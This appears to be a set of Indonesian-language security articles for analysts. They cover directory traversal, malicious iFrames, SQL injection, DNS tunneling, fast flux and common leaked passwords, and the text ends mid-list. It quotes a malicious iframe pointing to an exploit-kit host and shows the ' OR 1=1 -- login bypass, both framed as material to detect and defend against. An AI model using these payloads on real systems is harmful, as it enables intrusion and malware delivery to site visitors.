Apa itu Directory Traversal?

Serangan dan ancaman directory traversal memanfaatkan validasi yang tidak benar dari input yang disediakan pengguna, yang memungkinkan aktor ancaman untuk mendapatkan akses yang tidak diinginkan ke sistem file. Jenis eksploit ini memanfaatkan praktik pemrograman yang buruk yang gagal untuk memeriksa input yang disediakan oleh pengguna yang memungkinkan pengguna untuk bergerak melalui struktur direktori di luar batas-batas tingkat direktori halaman web.

Prinsip utama serangan traversal direktori adalah melalui web server. Web server, ketika diinstal, diberikan sebuah direktori root pada server, seperti c: \ Inetpub \ wwwroot. Semua file pada halaman web umumnya terdapat dalam direktori ini dan subdirektorinya. Direktori dalam struktur file di luar direktori "root" ini tidak dimaksudkan untuk diakses.

Ketika seseorang melakukan traversal direktori mencoba mengakses struktur file lainnya dengan memasukkan URL yang dibuat, yang akan memungkinkan akses atau bahkan memungkinkan eksekusi program pada server host. Perhatikan gambar berikut:

URL dibagi menjadi dua bagian. Awalnya, https://drive.google.com, adalah situs sebenarnya yang sedang dikunjungi dan bagaimana akses ke server web diperoleh. Sesampai di sana, sisa fungsi URI seperti struktur direktori di komputer. Dari direktori root web-server, ia masuk ke dalam subdirektori untuk menemukan konten yang ingin ditampilkan di browser. Semuanya terlihat normal di sini.

Bayangkan bagaimana keuntungan dari traversal direktori yang memungkinkan untuk digunakan untuk menjelajahi sistem file lainnya. Tambahkan beberapa karakter yang mungkin anda familiar bagi yang sering menggunakan navigasi baris perintah : 

Perhatikan bahwa bagian pertama yang dikelilingi oleh kotak adalah URL (nomor port juga termasuk) yang menyediakan akses ke situs web. Kali ini, daripada membiarkan halaman mengikuti struktur direktori ke konten pilihan yang kita cari, pengguna bisa saja memasukkan beberapa .. \ secara berurutan ke URL. 

Menavigasi sistem file melalui baris perintah secara efektif memberitahu server web untuk naik satu tingkat direktori. Untuk setiap iterasi dari pola karakter, pengguna mendorong dirinya sendiri lebih jauh melalui sistem file. Mereka akan mencapai c: \ Inetpub \ wwwroot (lokasi halaman web pada server web berbasis Windows) dan dilewatkan ke c: \ Inetpub, dan kemudian c: \ (direktori tingkat atas umum pada web berbasis Windows server). Jika menambahkan lebih banyak karakter ...  daripada direktori yang tersedia untuk dilewati, bukan masalah karena setiap set ekstra akan menuntun pengguna di direktori teratas (karena tidak ada tempat yang lebih tinggi lagi). 

Dalam contoh diatas, bagian terakhir dari alamat adalah boot.ini. File konfigurasi ini berisi teks ASCII, sehingga browser web hanya menampilkan konten kepada pengguna seolah-olah menampilkan halaman web apa pun. Tinjau informasi berharga tentang server web.

Lebih jauh lagi, lihat contoh dibawah ini :

Perhatikan URI : %255c, kode tsb akan di decode ke back-slash. Ini adalah bentuk obfuscation.

Kali ini, pengguna telah melihat-lihat lokasi yang executable (dalam hal ini, command prompt Windows) dan meneruskannya dengan memasukan beberapa argumen. Eksekusi dan output selanjutnya ditampilkan melalui browser. di contoh ini penyerang hanya menjalankan perintah dir, tetapi banyak hal lain yang bisa dia lakukan dengan menjalankan cmd.exe pada target? Apa yang bisa dieksekusi lainnya?

Traversal direktori juga dapat digunakan dengan skrip. Lihat contoh ini di server web berbasis Linux:

Kode ini akan disuntikkan ke skrip situs web dan kemudian diurai. Cookie akan diproses dan browser akan diarahkan ke file /etc/passwd.

Outputnya adalah isi dari /etc/passwd. Beberapa informasi yang sangat berharga dapat dikumpulkan di sini bukan?!.

Traversal direktori dapat menjadi teknik yang sangat berharga terhadap server web yang tidak melakukan tindakan pencegahan yang tepat untuk memvalidasi masukan. Semuanya dapat diakses, mulai dari target sidik jari hingga menemukan akun dan kata sandi, bahkan melakukan eksekusi kode. Aplikasi web-server modern sudah termasuk pengecekan input dan patch untuk mengatasi celah keamanan ini. Oleh karena itu, kerentanan ini jarang terlihat kecuali untuk sistem warisan, yang jarang dimaintenance dan diperbarui.

Jika anda ingin mengeksplore lebih jauh tentang traversal direktori, cobalah gunakan environment yang disediakan pada OWASP Mutillidae.

Malicious iFrame (Inline Frames Berbahaya)

Di Internet saat ini, beberapa ancaman berbasis web yang paling canggih dan dirancang untuk bersembunyi di depan mata pada situs situs web yang sah. Sebagian besar malware web terdiri dari skrip kode jahat (malicious script) yang tersembunyi di dalam inline frames, atau disebut dengan iFrames. 

IFrame adalah elemen HTML yang memungkinkan pengembang situs web memuat halaman web lain. Elemen HTML iFrame sering digunakan untuk memasukkan konten seperti iklan dari sumber lain ke halaman web tsb.

Menyisipkan iFrame HTML yang berbahaya ke dalam situs web yang sah telah menjadi vektor serangan umum yang digunakan dalam serangan berbasis web. Terkadang, tidak hanya halaman situs web yang sah yang terinfeksi, tetapi semua halaman lain di situs web juga dapat terinfeksi. Ini dapat menunjukkan bahwa penyerang menggunakan injeksi SQL untuk menyuntikkan iFrame jahat ke dalam database backend dari mana laman web dibuat secara dinamis. Serangan injeksi SQL artikel sebelunya  "SQL Injection (Injeksi SQL)"

Sekarang cara ini menjadi populer dengan maksud untuk mencoba memuat malware ke PC pengguna tanpa mereka pergi ke situs web jahat atau situs web yang disusupi. Bahkan, mereka hanya perlu mengklik tautan di pencarian Google untuk situs populer, di mana exploit telah dimuat. Situs yang terpengaruh termasuk USA Today, Wal-Mart, dan ZD Net Asia, tetapi menyebar.

Halaman web jahat yang dimuat menggunakan iFrame dapat dibuat tidak terlihat dengan hanya menampilkan beberapa piksel (bisa hanya satu piksel) sehingga korban tidak dapat melihat bahwa terdapat elemen iFrame disana. Laman web jahat dapat digunakan untuk mengirimkan eksploit yang akan berjalan secara otomatis ke komputer korban.

Dalam screenshot Wireshark di bawah ini, paket HTTP antara ip address 31.22.4.108 (situs web yang disusupi 30oct2007.com) dan 192.168.204.162 (host korban) berisi iFrame dengan : 

<iframe src = 'http: //eesheshi.ontowess.com: 8000 / fdoufeipqrxkf? Zxchqtevykm = 2404448 'style =' width: 10px; tinggi: 10px; ' frameborder = 'no'> </ iframe> 

sebagai sumber iFrame.

Dalam contoh ini, malware tersebut adalah perangkat eksploitasi "Neutrino yang dikirim dari host yang disusupi 212.83.135.167 eesheshi.ontowess.com ke host korban 192.168.204.162.

SQL Injection (Injeksi SQL)

Serangan SQL menjadi sangat umum dikarenakan adanya database, yang sering mengandung informasi sensitif dan berharga, adalah target yang menarik. Salah satu serangan SQL yang paling umum adalah serangan injeksi SQL (SQL Injection).

Diskusi publik pertama tentang injeksi SQL mulai muncul sekitar tahun 1998. Pada tahun 2017, injeksi SQL dinilai sebagai serangan nomor satu di daftar 10 teratas OWASP.

Pada tahun 2012, sebuah grup hacker yang menyebut dirinya sebagai "D33DS Company" membocorkan alamat surel dan kata sandi untuk 450.000 akun Yahoo. D33DS mengatakan memperoleh data dengan mengeksekusi serangan injeksi SQL terhadap subdomain Yahoo yang tidak disebutkan namanya, yang telah diidentifikasi oleh pakar keamanan sebagai Yahoo Voices. (Sumber: Berita Yahoo)

Analis keamanan harus dapat mengenali kueri SQL yang mencurigakan untuk mendeteksi jika database relasional telah mengalami serangan injeksi SQL.

Serangan injeksi SQL terdiri dari memasukkan kueri SQL melalui data input dari klien ke aplikasi. Eksploitasi injeksi SQL yang berhasil dapat memungkinkan orang yang mengeksekusinya membaca data sensitif dari database, mengubah data basis data, menjalankan operasi administrasi pada database, dan, terkadang, mengeluarkan perintah ke sistem operasi.

Terkecuali aplikasi menggunakan validasi data terhadap masukan atau input secara ketat, akan menjadi rentan terhadap serangan injeksi SQL jika aplikasi menerima dan memproses data yang disediakan pengguna tanpa validasi data masukan apa pun, penyerang dapat mengirimkan string input perusak yang berbahaya untuk memicu serangan injeksi SQL.

Di bawah ini adalah contoh sederhana dari web server dengan halaman login dan backend SQL. Kueri SQL normal mungkin terlihat seperti ini:

SELECT UserID FROM user WHERE username = 'admin' AND password = 'i<3Cisco'

Filed admin dan i<3Cisco digunakan oleh pengguna saat proses login. Server SQL mencari tabel pengguna untuk menemukan entri pertama yang cocok dengan kredensial tersebut. Jika gagal, tidak ada yang akan dikembalikan dan pengguna tidak akan diizinkan untuk masuk. Jika berhasil, ID pengguna akan dikembalikan dan proses login akan dilanjutkan.

Berikut ini adalah kueri yang sama dengan injeksi SQL:

SELECT UserID FROM users WHERE username = 'anything' OR 1=1 -- AND password = 'hacktheplanet'

Sebagai seorang analis, jika Anda melihat string " OR 1 = 1 -- <space>" dalam bentuk respons HTTP, apa yang harus Anda curigai?

Bagian pertama dari kueri, SELECT UserID FROM users WHERE username =, adalah hardcoded, yang tidak dikontrol oleh penyerang.

Penyerang bermain di bagian lain, di mana nama pengguna di sini adalah anything. Tidak masalah apakah pengguna itu benar-benar ada atau tidak, karena OR 1 = 1 menimpa pemeriksaan nama pengguna. Karena menggunakan OR, bagian pertama bisa saja gagal (misalnya, nama pengguna tidak valid), tetapi kueri akan tetap berhasil (karena 1 selalu sama dengan 1).

Bagian terakhir dari query adalah kata sandi, tetapi karena penyerang menyediakan dua garis dan spasi (-- <spasi>), itu merupakan sebuah komentar. Meskipun penyerang mengetik hacktheplanet ke dalam field kata sandi, kata sandi tidak akan ditafsirkan oleh server SQL. Perhatikan bahwa harus ada spasi setelah tanda hubung ganda (--).

Hasilnya adalah bahwa permintaan akan berhasil, meskipun seharusnya gagal, mengingat nama pengguna dan kata sandi yang tidak valid. Masalahnya adalah penyerang akan masuk sebagai pengguna pertama yang cocok, yang bukan merupakan hal yang baik karena pengguna pertama dalam database umumnya adalah administrator. Serangan dapat dimodifikasi untuk menargetkan nama pengguna tertentu, tetapi penyerang harus tahu (atau menebak) nama pengguna itu.

Ada banyak variasi pada serangan ini, tergantung pada SQL server yang tepat. Komentar mungkin perlu tanda pound (#) bukan double-dash (-). Kutipan tunggal (') mungkin perlu berupa kutipan ganda ("). Singkatnya, ini tergantung pada SQL yang digunakan vendor, dan sintaks pernyataan SQL yang digunakan oleh web server. Analis harus hati-hati terhadap tanda kutip tunggal, tanda kutip ganda, dan titik koma, yang dapat digunakan untuk keluar dan menambahkan perintah SQL baru.

Sebagai seorang analis, jika Anda menemukan permintaan SQL seperti itu, Anda perlu menentukan ID pengguna mana yang digunakan oleh penyerang untuk masuk, kemudian mengidentifikasi informasi apa pun atau akses lebih lanjut yang dapat dimanfaatkan oleh penyerang setelah berhasil masuk.

Contoh berikut menunjukkan hasil kueri SQL setelah memasukkan ' or 1=1 -- <space> pada field nama (sekali lagi, ruang tambahan penting) :

Dalam hal ini, menggunakan query SQL tsb semua data akun untuk semua akun dalam database SQL berhasil diekstraksi.

Penanggulangan termasuk yang berikut:

• Pengembang aplikasi harus mengikuti praktik terbaik untuk melakukan validasi masukan pengguna yang tepat, membatasi, dan membersihkan data input pengguna.
• Referensi "the OWASP SQL Injection Prevention Cheat Sheet" : https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet.
• Terapkan solusi IPS untuk mendeteksi dan mencegah injeksi SQL berbahaya.

Command Injection (Injeksi Perintah)

Command Injections (injeksi perintah) adalah sebuah bentuk serangan dimana tujuan penyerang adalah untuk mengeksekusi perintah sewenang-wenang di sistem operasi web server melalui aplikasi web yang rentan. serangan ini bisa terjadi ketika aplikasi berbasis web menyediakan kolom input yang rentan dan tidak aman kepada pengguna untuk memasukkan data/perintah berbahaya.

Selama serangan command injection, perintah diinput oleh penyerang biasanya dijalankan berdasarkan kerentanan dari aplikasi web tertentu. Serangan command injection terjadi sebagian besar karena lemahnya atau tidak memadainya validasi dari input. Injeksi SQL dan XSS (cross-site scripting) adalah dua bentuk serangan command injection yang spesifik.

Serangan injeksi, seperti SQL injection dan OS injection, terjadi ketika data yang tidak dipercaya dikirim ke intepreter sebagai bagian dari perintah atau kueri. Data yang dikirim dapat mengelabui intepreter untuk mengeksekusi perintah yang tidak diinginkan atau mengakses data tanpa otorisasi yang tepat.

OWASP (Open Web Application Security Project) sumber daya non-profit yang menawarkan perangkat lunak bebas dan terbuka yang berfokus pada peningkatan keamanan perangkat lunak. OWASP mempublish daftar kerentanan dalam aplikasi web 2017 atau OWASP Top 10 - 2017 The Ten Most Critical Web Application Security Risks.

Artikel lengkap OWASP The Ten Most Critical Web Application Security Risks diakses melalui link ini

DNS Tunneling (Botnet DNS Tunneling)

Pada 2011, botnet mulai menggunakan lalu lintas DNS untuk menutup data yang dicuri secara tersembunyi. Botnets menggunakan layanan DNS mereka sendiri untuk komunikasi proxy dari perangkat yang terinfeksi ke pengendali botnet. Topik ini menjelaskan bagaimana DNS telah memainkan peran yang semakin penting dalam evolusi botnet, termasuk beberapa teknik CnC baru yang mengkhawatirkan yang melengkapi protokol yang dieksploitasi lainnya: IRC, HTTP, dan P2P.

Analis keamanan harus dapat mendeteksi jika penyerang menggunakan tunneling DNS untuk mengeksfiltrasi data dari jaringan mereka.

Pada tahun 1999, malware (virus, worm, Trojans, dan sebagainya) berevolusi dari infeksi yang terisolasi menjadi botnet perangkat yang saling terhubung. Sejak saat itu, organisasi cybercriminal dan komunitas keamanan telah mengobarkan perlombaan senjata yang semakin rumit. Perang ini telah menghasilkan evolusi teknik CnC botnet yang sangat kuat, tersembunyi, dan mobile.

Evolusi dari Botnet telah mengeksploitasi protokol lalu lintas DNS. DNS selalu menjadi salah satu komponen Internet yang paling kuat dan ada di mana-mana. Dan hari ini, dengan memanfaatkan DNS, botnet juga menjadi tersebar di mana-mana baik di jaringan rumah maupun perusahaan. Meskipun klaim deteksi dan pencegahan banyak dari solusi keamanan "generasi berikutnya", jaringan perusahaan tidak dapat ditembus. Ada terlalu banyak vektor serangan dan ancaman lanjutan yang terus-menerus untuk setiap kombinasi lapisan pencegahan untuk menjamin perlindungan masuk 100%.

Saat ini, perusahaan memahami kerusakan luar biasa yang dapat dotimbulkan oleh botnet, namun sebagian besar masih mengabaikan DNS. Biasanya, lalu lintas DNS hanya diperiksa setelah insiden keamanan terjadi sebagai bagian dari penyelidikan forensik. Perilaku reaksioner ini tampaknya bertentangan dengan kecenderungan bahwa biaya paling besar dikeluarkan dari tim legal yang menyelesaikan permasalahan data dan identitas yang dicuri, daripada tim TI yang memulihkan perangkat yang terinfeksi. Keadaan cybercrime saat ini menuntut strategi pertahanan mendalam organisasi untuk bergeser, dari pendekatan “deteksi dan pencegahan” saat ini, menjadi paradigma "mencegah dan menahan".

Botnet bukan hanya sekedar infeksi — ini adalah jaringan perangkat yang terinfeksi yang beroperasi di dalam lingkungan Anda, tetapi di luar kendali Anda. Banyak penelitian menunjukkan bahwa sebagian besar perusahaan, termasuk perusahaan Fortune 500, memiliki banyak perangkat yang terhubung ke jaringan yang terinfeksi malware. Oleh karena itu, sangat penting untuk secara proaktif menahan botnet dengan mengambil kembali kontrol. Terapkan solusi yang mampu memblokir mekanisme reli dan komunikasi keluar yang berasal dari malware. Melakukan hal itu berarti anda mencegah kebocoran data dan kejahatan dunia maya lainnya terjadi di jaringan Anda.

DNS Tunneling adalah tempat protokol atau data lain disembunyikan di dalam paket DNS. Biasanya, penyerang akan menggunakan tunneling DNS untuk eksfiltrasi data tersembunyi dalam pencurian data, atau untuk komunikasi lalu lintas CnC. Untuk konteks historis, tunneling DNS telah ada sejak tahun 1998. Pada tahun 2004, DNS-guru Dan Kaminsky secara luas mempresentasikan penerapannya untuk mentransmisikan data arbitrer terhadap DNS ke komunitas keamanan. Sejak itu, jumlah kit terowongan DNS sederhana yang telah dibuat dengan mudah diakses selama beberapa tahun terakhir ini mengkhawatirkan. Cybercriminal dapat menggunakan perangkat DNS tunneling semacam itu untuk membangun botnet guna melewati solusi keamanan tradisional.

Serangan Berbasis DNS part II (Fast Flux, Double Flux dan DGA)

Fast Flux

Fast flux adalah teknik DNS yang digunakan oleh penyerang untuk menyembunyikan situs phishing dan malware mereka di balik jaringan yang terus berubah dari host yang dikompromikan bertindak sebagai proxy. Ide dasar di balik fast flux adalah memiliki banyak alamat IP yang terasosisikan dengan nama domain yang sepenuhnya memenuhi legal, di mana alamat IP diubah dengan frekuensi sangat tinggi (biasanya beberapa detik hingga beberapa menit) dengan mengubah catatan record A DNS. TTL untuk setiap resource DNS juga dibuat sangat singkat. Misalnya, korban yang terhubung ke situs web terinfeksi yang sama setiap menit sebenarnya dapat terhubung ke server terinfeksi yang berbeda setiap kali.

Botnet adalah jaringan komputer yang terinfeksi yang dikendalikan oleh software berbahaya. Botnets menggunakan beberapa mekanisme untuk berkomunikasi dengan server CnC pusat seperti DNS, HTTP, HTTPS, IRC, dan sebagainya. Botnets sering menggunakan teknik Fast Flux. Fast Flux memungkinkan botnet untuk memanfaatkan sejumlah pergeseran host yang terinfeksi yang tersembunyi di balik satu domain yang sah.

Botnets juga dapat menggunakan satu atau lebih nama domain diasosiasikan ke banyak alamat IP yang berbeda selama rentang waktu yang singkat. Teknik ini juga dikenal sebagai FFSN. Mencatat DNS berbahaya seringkali lebih sulit daripada alamat IP yang dikompromikan, karena banyak catatan DNS dapat dibuat untuk alamat IP yang sama atau berbeda beda.

Dalam contoh yang ditunjukkan pada gambar di atas, contoh hostname example.com yang sama diubah ke alamat IP yang berbeda beda, karena alamat IP example.com berubah dengan cepat. Karena alamat IP berubah dengan cepat, teknik blacklist tradisional yang menggunakan alamat IP tidak akan efektif. fast flux efektif menyembunyikan server jahat dari deteksi dan sehingga seorang defender tidak dapat menemukan satu titik pun untuk memfokuskan upaya mereka.

Double Flux

Teknik multifaset lain yang digunakan oleh penyerang dimana dengan cepat mengubah baik nama host ke pemetaan alamat IP, dimana juga digunakan oleh nameserver otoritatif menggunakan catatan resource dari  server DNS, yang dikenal sebagai "double IP flux." Dalam contoh yang ditunjukkan pada gambar di atas, ns.example.com adalah salah satu server nama otoritatif yang digunakan untuk domain penyerang, dan alamat IP dari server ns.example.com juga berubah dengan cepat. Double IP flux menambahkan lapisan tambahan untuk membuatnya lebih sulit untuk menentukan sumber serangannya.

Serangan Berbasis DNS (DNS-Based Attack)

Tanpa DNS, Internet tidak akan berfungsi dengan mudah sebagai mana kita gunakan saat ini. DNS memainkan peran penting dalam cybersecurity, karena sebuah server DNS rentan terhadap serangan dan digunakan sebagai vektor yang umum dalam serangan.

Analisis Laporan Keamanan Tahunan Cisco 2016 dari malware yang telah divalidasi sebagai "known bad," menemukan bahwa mayoritas, 91,3%, attacker menggunakan DNS untuk melaksanakan kampanyenya.

Malware memanfaatkan DNS dalam tiga cara berikut:

• Untuk mendapatkan CnC (Command and Control)
• Untuk mengeksfiltrasi data
• Untuk mengarahkan lalu lintas korban (redirect traffic)

CnC adalah komputer yang mengeluarkan arahan ke perangkat digital yang telah terinfeksi rootkit atau jenis malware lainnya, seperti ransomware. Server C & C dapat digunakan untuk membuat jaringan yang kuat dari perangkat yang terinfeksi yang mampu melakukan serangan terdistribusi-of-service (DDoS) terdistribusi, mencuri data, menghapus data atau mengenkripsi data untuk melaksanakan skema pemerasan.

Contoh serangan berbasis DNS yang bagus adalah DNSChanger, Trojan yang mengubah pengaturan DNS pada host yang terinfeksi. Trojan DNSChanger menggantikan nameserver dengan mlikik mereka sendiri untuk mengarahkan web dan permintaan lain dari host yang terinfeksi ke set server yang dikendalikan oleh penyerang yang dapat mencegat, memeriksa, dan memodifikasi lalu lintas host yang terinfeksi. Pada puncaknya, Trojan DNSChanger diperkirakan telah menginfeksi lebih dari 4 juta komputer.

Meskipun para penyerang bergantung pada DNS untuk menyebarkan lebih lanjut kampanye malware, beberapa perusahaan memantau DNS untuk tujuan keamanan. Kurangnya pengawasan ini menjadikan DNS sebagai jalan ideal bagi penyerang. Menurut survei terbaru yang dilakukan oleh Cisco, 68% dari profesional keamanan melaporkan bahwa organisasi mereka tidak memantau aktivitas DNS mereka. Salah satu alasan mengapa organisasi gagal memantau DNS adalah karena tim keamanan dan pakar DNS biasanya bekerja di berbagai grup TI dalam perusahaan dan oleh karena itu tidak memiliki kesempatan untuk sering berinteraksi.

Password Attack (100 Password Terburuk Selama Tahun 2017)

Serangan terhadap password/kata sandi telah menjadi masalah berkelanjutan bagi para Network Security engineers. Setiap tahun SplashData menerbitkan laporan tentang kata sandi yang paling umum digunakan yang bocor secara online. Pada tahun 2017, mereka menganalisis 5 juta kata sandi bocor terutama dari pengguna Amerika Utara dan Eropa Barat, yang terungkap dari kata sandi yang berhasil diretas sepanjang tahun 2017, dan melaporkan 25 teratas. Kata sandi "password" adalah nomor 2 pada daftar. Lima dari 10 teratas adalah urutan numerik yang dimulai dengan 1 dan bervariasi hanya dalam panjang urutan (misalnya, 123456). Lima lagi dari 25 teratas adalah urutan alfa-numerik sederhana (seperti abc123). Ada beberapa kata sandi yang cukup baik, namun masih buruk secara keamanan, seperti trustno1 dan letmein. 11 sisanya adalah kata kamus sederhana, semuanya dalam huruf kecil. 25 kata sandi teratas ini mewakili 2,2% dari 5 juta kata sandi bocor.

25 kata sandi terburuk selama tahun 2017 adalah :

1 - 123456 (ranking tidak berubah sejak 2016) 

2 - password (ranking tidak berubah) 

3 - 12345678 

4 - qwerty 

5 - 12345 

6 - 123456789 

7 - letmein 

8 - 1234567 

9 - football 

10 - iloveyou 

11 - admin

12 - welcome

13 - monkey

14 - login 

15 - abc123 

16 - starwars 

17 - 123123 

18 - dragon 

19 - passw0rd 

20 - master

21 - hello 

22 - freedom 

23 - whatever 

24 - qazwsx 

25 - trustno1 

Untuk daftar lengkap 100 kata sandi terburuk selama 2017 bisa lihat disini.

Analis keamanan harus menyadari metode serangan kata sandi yang berbeda dan menerapkan penanggulangan terhadap serangan kata sandi. Berikut ini adalah beberapa metode yang digunakan penyerang untuk mendapatkan kata sandi pengguna: